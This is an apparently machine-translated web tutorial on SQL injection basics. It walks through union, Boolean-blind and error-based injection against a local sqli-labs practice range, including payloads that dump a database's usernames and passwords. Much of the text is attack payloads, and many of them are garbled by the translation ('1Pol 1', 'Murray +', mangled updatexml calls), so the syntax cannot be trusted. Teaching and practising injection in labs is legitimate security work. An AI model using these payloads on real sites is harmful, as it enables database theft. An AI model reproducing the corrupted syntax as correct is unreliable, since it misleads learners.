Shulou(Shulou.com)05/31 Report--

This article mainly introduces the relevant knowledge of "what are the basic knowledge points of SQL injection in web security". The editor shows you the operation process through an actual case. The operation method is simple, fast and practical. I hope this article "what are the basic knowledge points of SQL injection in web security" can help you solve the problem.

SQL injection basis

SQL injection describes the Web request response process:

What is SQL injection?

It means that the web application does not judge the validity of the data input by the user, the parameters passed into the back end of the front end are controllable by the attacker, and the parameters are brought into the database query, and the attacker can construct different SQL statements to achieve arbitrary operations on the database.

Why is sql injection generated?

Developers can use dynamic SQL statements to create generic and flexible applications. Dynamic SQL statements are constructed during execution, which generate different sql statements according to different conditions. When developers need to decide which fields to extract (such as select statements) according to different query criteria, or select different query tables according to different conditions, it is useful to construct SQL statements dynamically.

The Php statement is a column:

$query= "SELECT * FROM users WHERE id = $_ GET ['id']"

Because the parameter ID is controllable and brought into the database query, illegal users can arbitrarily concatenate SQL statements to attack.

The principle of SQL injection which two conditions need to be met for the generation of Sql injection vulnerabilities?

Parameters can be controlled by the user: the content of the parameters transmitted from the front end to the back end can be controlled by the user.

Parameters into the database query: the passed parameters are concatenated to the sql statement and brought into the database query.

When the ID parameter is 1', the code executed by the database is as follows.

Sehlect * from users where id = 1'

This will report an error because it does not conform to the database syntax specification.

When the ID parameter passed in is and 1 to 1, the SQL statement executed is as follows.

Select * from users where id = 1 'and 1

Because 1x1 is true and id1=1 is true in the where statement, the page returns the same result as id=1.

When the ID parameter passed in is and 1: 2, because 1: 2 is not valid, false is returned, and the page will return a different result from id=1.

As a result, it can be preliminarily judged that there are SQL injection vulnerabilities in ID parameters, and attackers can further splice SQL statements to attack, resulting in database information disclosure, and even further access to server permissions.

In the real environment, SQL injection vulnerabilities may exist in any parameters that meet the above two conditions, so developers should adhere to the principle that "external parameters are unreliable".

Knowledge points related to MySQL injection Mysql database

Database A = website A

Table name

Column name

data

Database B = website B

Database

After the MySql5.0 version, MySql defaults to storing a "information_schema" database in the database, where readers need to remember three table names, namely

SCHEMATA,TABLES,COLUMNS

The SCHEMNSz table stores the database names of all databases created by this user. We need to remember that the field name of the database database name in this table is SCHEMA_NAME.

The TABLES table stores the library name and table name of all databases created by the user, and we need to remember that the field names of the record database name and table name in this table are TABLE_SCHEMA and TABLE_NAME, respectively.

The field names of COLUMNS table names and field names are TABLE_SCHEMA,TABLE_NAME and COLUMN_NAME.

Mysql query statement

When you don't know any conditions, the statement looks like this.

The name of the field to be queried by SELECT FROM library name. Table name

When you know a known condition, the statement looks like this.

The name of the field to be queried by SELECT FROM library name. Table name WHERE Field name of known condition = 'value of known condition'

When two known conditions are known, the statement looks like this.

The name of the field to be queried by SELECT FROM library name. Table name WHERE already knows the field name of condition 1 = 'value of known condition 1' AND field name of known condition 2 = 'value of known condition 2'

The usage of Limit

The format of Limit is limit mdirection n, where m refers to the position where the record begins, starting from 0, represents the first record, and n refers to fetching n records.

For example, limit 0Pol 1 means to take a record from the first record.

A few functions to remember

Database (): the database used by the current website

Version (): the current version of MySQL

User (): the current MySQL user

Annotation symbol

In MySQL, the expression of common comment characters: # or-- space or / * * /

Inline comment

The form of inline comments: /! Code/ . Inline comments can be used throughout the SQL statement to execute our SQL statement. Here is a column:

Index.php?id=-15 / *! UNION*/ / *! SELECT*/ 1

Union (joint) injection attack

Online shooting range

Http://127.0.0.1/sqli-labs/Less-1/?id=1

First, judge whether to use (') as string quotation marks

Http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1-+

Https://blog.csdn.net/qq_41630808/article/details/80570197

Normal output

An error indicates that it is not closed, indicating that it is useless "may not be useful" or that "or () is used.

Http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+

Is a''string injection

Second, determine how many columns there are in the database it is located in.

Http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 3-- + determines whether there are three columns

Normal

Http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 4-- + determines whether there are 4 columns

Error

It indicates that the database where its output is located has three columns.

Third, judge which column of the database what he displays.

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, 2, 3-- +

Then Your Login name is in the second column and Your Password is in the third column.

I choose to output what I want in the second column.

Fourth, find out the current user permissions

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1 (), 3-- +

Root permission

5. Find the current database

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1 database (), 3-- +

The current database is security VI. Find the table name of security

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = 'security'), 3-- +

The table name is emails,referers,uagents,users

Group_concat () calculates which rows belong to the same group and displays the columns that belong to the same group. Which columns to return, by the function

The number parameter (that is, the field name) determines

7. Find the fields in users

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat (column_name) from information_schema.columns where table_schema = 'security' and table_name =' users'), 3-- +

8. Find the user name

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat (username) from security.users), 3-- +

9. Find the password

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat (password) from security.users), 3-- +

In this way, this is done. I've got the account password.

Union (joint) injection code analysis

In the Union injection page, the program gets the GET parameter ID, splices the ID into the SQL statement, queries the database for the corresponding content of the parameter ID, and then outputs the username and address in the first query result to the page

Because the data is output to the page, other data is queried using the Union statement, as follows:

! [

] (http://ww1.sinaimg.cn/large/007bHQE8gy1g58le58wz5j30ou0bo77h.jpg)

When id=1 union select 1 is accessed, the SQL statement executed is:

`Select * from users where 'id'=1 union select 1 Magi 2,3``

At this time, the sql statement can be divided into two items: select\ * from users where 'id'=1 and union select 1Jing 2Jing 3. The data in the database can be obtained by using the second statement (Union query).

(optimize to add sql statement execution code to source code)

Boolean (Boolean) injection attack

1 'and length (database ()) > = 1 Murray + / / judge the length of the database

L'and substr (database (), 1Power1) ='t'--+ / / judge the value of the first letter in the database

L'and substr (database (), 2jin1) ='q'-- + / / judge the value of the second letter in the database

L'and ord (substr (database (), 1mem1)) = 115Meltel + / / use ord and ASCII to determine the database name

L'and substr (database (), 2jin1) = 'qqqinglymuri + / / use substr to judge the database name.

L'and substr (select table_name from information_schema.table where table_schema='sql' limit 0Pol 1), 1Jing 1) ='e'-- + / / use substr to determine the table name of the database

1. Length (str): returns the length of the str string.

2. Substr (str, pos, len): str intercepts len-length characters from the pos position and returns them. Note that the pos position here starts at 1, not the 0 of the array.

3. Mid (str,pos,len): as above, intercept the string

4. Ascii (str): returns the ASCII code value of the leftmost character of the string str.

5. Ord (str): same as above, return ascii code

6. If: an is the condition, an is true, and b is returned. Otherwise, c is returned, such as if (1 > 2 ~ 1 ~ 1 ~ 0), and 0

Boolean (Boolean) injection code analysis

In the Boolean injection page, the program first obtains the GET parameter ID, and determines whether there are dangerous characters such as union/sleep/benchmark through preg_match. Then concatenate the parameter ID into the SQL statement and query it from the database

When accessing id=1' or 1 / 1% 23, the statement executed by the database is selcet * from user where 'id'='1' or 1 / 23. Since or 1 / 2 is always true, all will return to normal at this time. When accessing id=1' and 1 / 2% 23

The statement executed by the database is select * from users where 'id' =' 1' and 1'2', and since and'1' ='2' is a permanent false condition, all pages will definitely return an error at this time.

Error injection attack

Updatexml (1 select user concat (0x7e, (select user ()), 0x7e), 1)-- + / / use updatexml to get user ()

'and updatexml (1 select database concat (0x7e, (select database ()), 0x7e), 1)-- + / / use updatexml to get database ()

`'and updatexml (1 select select schema_name from information_schema.schemata limit concat (0x7e, (0Jing 1), 0x7e), 1)-- + * * / / * * obtain the database name using error injection

'and updatexml (1) concat (0x7e, (select select table_name from information_schema.tables where table_schema=' test' limit 0), 0x7e), 1)-- + / / obtain the database table name using error injection

# # Analysis of error injection attack Code * * on the error injection page, the program obtains the GET parameter username, splices the username into the SQL statement, and then queries the database. * *! [] (when http://ww1.sinaimg.cn/large/007bHQE8gy1g58lsi2dz3j30ua0a9419.jpg) enters username=1', the SQL statement is select * from user where 'username'='1 ". An error will be reported because of an extra single quotation mark during execution. With this error echo, we can output the contents of the query to the page through floor (), updatexml () and other functions. This is the end of the content about "what are the basic knowledge points of SQL injection in web security". Thank you for reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.